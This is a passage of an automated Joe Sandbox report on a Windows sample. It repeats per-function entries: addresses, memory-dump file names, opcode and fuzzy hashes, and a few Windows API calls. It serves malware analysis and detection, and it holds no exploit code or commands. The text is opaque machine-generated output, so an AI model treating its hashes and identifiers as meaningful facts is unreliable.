                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3Version
                                                                                              • String ID:
                                                                                              • API String ID: 2775145068-0
                                                                                              • Opcode ID: d67669d411da673e3a82819a2beecc16404aabe516aadcc51dff5f9b0f0739b1
                                                                                              • Instruction ID: 674d27302765b315ced84daa6671a8d354d0986074bc588caa28a97c4559b17a
                                                                                              • Opcode Fuzzy Hash: d67669d411da673e3a82819a2beecc16404aabe516aadcc51dff5f9b0f0739b1
                                                                                              • Instruction Fuzzy Hash: D2F0A43040424CCEEB24DF71AC457DC7BB05B16308F00A469D62E37352E7B8558D8B11
                                                                                              Function 00E65AFE Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: gj
                                                                                              • API String ID: 0-4203073231
                                                                                              • Opcode ID: ba9da8e48649a1a6165d5c58c9edd9ee873b1ea9c9f5ab92aa2f799c65be4ce1
                                                                                              • Instruction ID: b0ae5b4f4dac756998436ddbb895df30f6a83f58e0751b31b3aab39f894a4b66
                                                                                              • Opcode Fuzzy Hash: ba9da8e48649a1a6165d5c58c9edd9ee873b1ea9c9f5ab92aa2f799c65be4ce1
                                                                                              • Instruction Fuzzy Hash: B9D13AB2A083458FC354CF69D84065AFBE2BFC9308F55492EE998D7301D734A959CF82
                                                                                              Function 00E86A0B Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00026A20,00E86445), ref: 00E86A10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: a2eb45a1a3a5da2e43969601f0092d7f5bd42b2e30a5f2849df8955123b7fb19
                                                                                              • Instruction ID: 0728e9d5dc5c371b577eaef3434c85ce121f82af6f82980306e32d8d0a5c04b4
                                                                                              • Opcode Fuzzy Hash: a2eb45a1a3a5da2e43969601f0092d7f5bd42b2e30a5f2849df8955123b7fb19
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 00E92CE0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapProcess
                                                                                              • String ID:
                                                                                              • API String ID: 54951025-0
                                                                                              • Opcode ID: da417a43beebdc9cc215fe7bcc9c7b8f706b384af139919ef6de1d4b9e1f40ae
                                                                                              • Instruction ID: dd5acd53dd3fe9dcc731624e0b696e3348a278627e154fb21a0df7f3452afafc
                                                                                              • Opcode Fuzzy Hash: da417a43beebdc9cc215fe7bcc9c7b8f706b384af139919ef6de1d4b9e1f40ae
                                                                                              • Instruction Fuzzy Hash: 9DA011302022008FAB008F33AA0820A3AA8EB002803A8802BA00AEA030EA2880088A00
                                                                                              Function 00E7ABC8 Relevance: 1.0, Instructions: 977COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                              • Instruction ID: 8ea915e295da257e1151ac25d3570b9bee5f8c2db0a54a7a34f41287edda3ea3
                                                                                              • Opcode Fuzzy Hash: 3656517a269937d65cae0d8ec39795bb2ba0f8e7439345b18be7eaed4085f102
                                                                                              • Instruction Fuzzy Hash: 3982E3316047859FCB29CF28C8907BABBE1AF95308F18D96DD89F9B346D730A945CB11
                                                                                              Function 00E65F39 Relevance: .9, Instructions: 899COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1ff048dea72ce26be74f433d34b34b2171fb7867c41190fb673386bb6e870cf7
                                                                                              • Instruction ID: 767a1f6957027361aa738840fa43673158a1e34b8de6c4aae53deda9e59eb403
                                                                                              • Opcode Fuzzy Hash: 1ff048dea72ce26be74f433d34b34b2171fb7867c41190fb673386bb6e870cf7
                                                                                              • Instruction Fuzzy Hash: 16823C65D39F895EE3039A3584021E7F3A86EFB1C9F46E71FF8A431426E721A6C75201
                                                                                              Function 00E7C27F Relevance: .9, Instructions: 880COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                              • Instruction ID: b0ee039022a2897167d502ef9515a46b72c07423960b5237946b436a5e8ca3f5
                                                                                              • Opcode Fuzzy Hash: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                                                                              • Instruction Fuzzy Hash: 407226716043858FCB19CF68C8906A9BBE6FF85304F28D5ADE89E9B346D730E945CB11
                                                                                              Function 00E75214 Relevance: .7, Instructions: 694COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                              • Instruction ID: ed22bf2ef631fc1d06e9eb352007e58e1d84d89a45362a9580e42fa077939c98
                                                                                              • Opcode Fuzzy Hash: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                                                                              • Instruction Fuzzy Hash: 20524B72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                              Function 00E7BC05 Relevance: .5, Instructions: 537COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c0c50b77e30e2a97e0966af0353011d2dc1e3decdb9be7aa0ca50f8364285d15
                                                                                              • Instruction ID: cd0c8e9324f1d705dd950399df7446c3323995c1d67cc02961f8745681cfe385
                                                                                              • Opcode Fuzzy Hash: c0c50b77e30e2a97e0966af0353011d2dc1e3decdb9be7aa0ca50f8364285d15
                                                                                              • Instruction Fuzzy Hash: 0E12D1706047068FD728CF28D891BB9B7E0FB48308F24993EE59AD7281E774A995CB41
                                                                                              Function 00E746CF Relevance: .3, Instructions: 330COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 00f72b056da5265264a23e6060e9acd5ffa9e684265bf2ed60474deed1c2bac6
                                                                                              • Instruction ID: 98cc4f85cf8f731f65929cfd3f9f0f9570419f185e93081bdac1304474d1d86b
                                                                                              • Opcode Fuzzy Hash: 00f72b056da5265264a23e6060e9acd5ffa9e684265bf2ed60474deed1c2bac6
                                                                                              • Instruction Fuzzy Hash: C2E14DB55083908FC344CF69D49146BBBF0AF99300F464A6EF5D8A7352D334EA1ADB62
                                                                                              Function 00E7A222 Relevance: .3, Instructions: 279COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d03f6d491a945607947d19f940b1a1745a3d664169419562031b70a47b71c96f
                                                                                              • Instruction ID: ac113c690091023488edda87dd6a57814f81e0f296dc8242a5e2b4bf2e548204
                                                                                              • Opcode Fuzzy Hash: d03f6d491a945607947d19f940b1a1745a3d664169419562031b70a47b71c96f
                                                                                              • Instruction Fuzzy Hash: CC9145312483418BD724DE68D884BEE77D2EFD0308F18993DE99EA7282E67598858753
                                                                                              Function 00E8C0D6 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ac0d2d26ce87e3266be6edb276cbdf3590fd04a1faafd93c7f5910a3a53c1917
                                                                                              • Instruction ID: 8d2198c5b758efe8cf28cca6070bf6740503b33d14d6fe46751c1d657297bf35
                                                                                              • Opcode Fuzzy Hash: ac0d2d26ce87e3266be6edb276cbdf3590fd04a1faafd93c7f5910a3a53c1917
                                                                                              • Instruction Fuzzy Hash: 82615A31640A0856DE38BAA858D97FE73E49B0770CF70341AE84EFB2E2D6359D468375
                                                                                              Function 00E8BEA7 Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction ID: c5464a02204666825f29a0078b03f78db52a6013afcfcfecba3bf25e8e25e19d
                                                                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                              • Instruction Fuzzy Hash: B6519821300B499ADF34B9688C567FF23D99B03348F283549E64EFB782C721AD45C726
                                                                                              Function 00E74D32 Relevance: .2, Instructions: 171COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2bf8d12a0b5834a57f5373b763d9bd3b6751a2a6bc9a279013d22f8352f4edb
                                                                                              • Instruction ID: 1e1410ce846ebb1dd9f1c934b849d5a5d8c3ebcc5438cb39aa0a563eda3dfa07
                                                                                              • Opcode Fuzzy Hash: b2bf8d12a0b5834a57f5373b763d9bd3b6751a2a6bc9a279013d22f8352f4edb
                                                                                              • Instruction Fuzzy Hash: DE51E8715083954FC711DF28844056EBFE0AEDA318F4A9999E4D96B183D330EA4ACB52
                                                                                              Function 00E75F0B Relevance: .1, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 204fcaa179abd8d6a43581dfc420ebca335be1531f8564926305292251ccdff4
                                                                                              • Instruction ID: ce6cdb4d62cba588d17814f0f02d313b8d88a715544efbea6df59f5597ed7d5c
                                                                                              • Opcode Fuzzy Hash: 204fcaa179abd8d6a43581dfc420ebca335be1531f8564926305292251ccdff4
                                                                                              • Instruction Fuzzy Hash: 6A51DDB2A087119FC758CF29D48055AF7E1FF88314F058A2EF899E7340DB30E9598B96
                                                                                              Function 00E7A008 Relevance: .1, Instructions: 112COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                              • Instruction ID: fdee1de57d903c17b849dcadf665bf07236795ddb02a816a26148a6f69657d42
                                                                                              • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                                                                              • Instruction Fuzzy Hash: BA31F0B16547068FCB14DF28D85116EBBE1EB95344F189A3DE49AE3342C335E809CB92
                                                                                              Function 00E67CBA Relevance: .1, Instructions: 106COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                              • Instruction ID: e3cd71a49ed94c43fecec04639609a25b47b4ba8794abf6de14c3ec0726191ae
                                                                                              • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                                                                              • Instruction Fuzzy Hash: 20410A30545B11CFC71ADF34E4559A6B7E0FF8A704B125CAFD06A9B221EB30EA04DB59
                                                                                              Function 00E892D0 Relevance: .1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction ID: 71c6795849f89eb395536bee67d5681e3699d4a8b02f230c92a5bddc8172e296
                                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                              • Instruction Fuzzy Hash: 7C11B177A0004147D605A67ED4B41FBE395FBC532972C7375D04E6B7DAC222D900A700
                                                                                              Function 00E73EAA Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 240COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00E73EEA
                                                                                                • Part of subcall function 00E6F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E6F6CD
                                                                                                • Part of subcall function 00E789ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00EAE088,?,00000007,00E733E2,?,?,00000050,522FB702), ref: 00E78A0A
                                                                                              • _strlen.LIBCMT ref: 00E73F0B
                                                                                              • SetDlgItemTextW.USER32(?,00EA919C,?), ref: 00E73F64
                                                                                              • GetWindowRect.USER32(?,?), ref: 00E73F9A
                                                                                              • GetClientRect.USER32(?,?), ref: 00E73FA6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E74051
                                                                                              • GetWindowRect.USER32(?,?), ref: 00E74081
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00E740B0
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00E740B8
                                                                                              • GetWindow.USER32(?,00000005), ref: 00E740C3
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00E740F3
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00E74165
                                                                                              Strings
                                                                                              Memory Dump Source
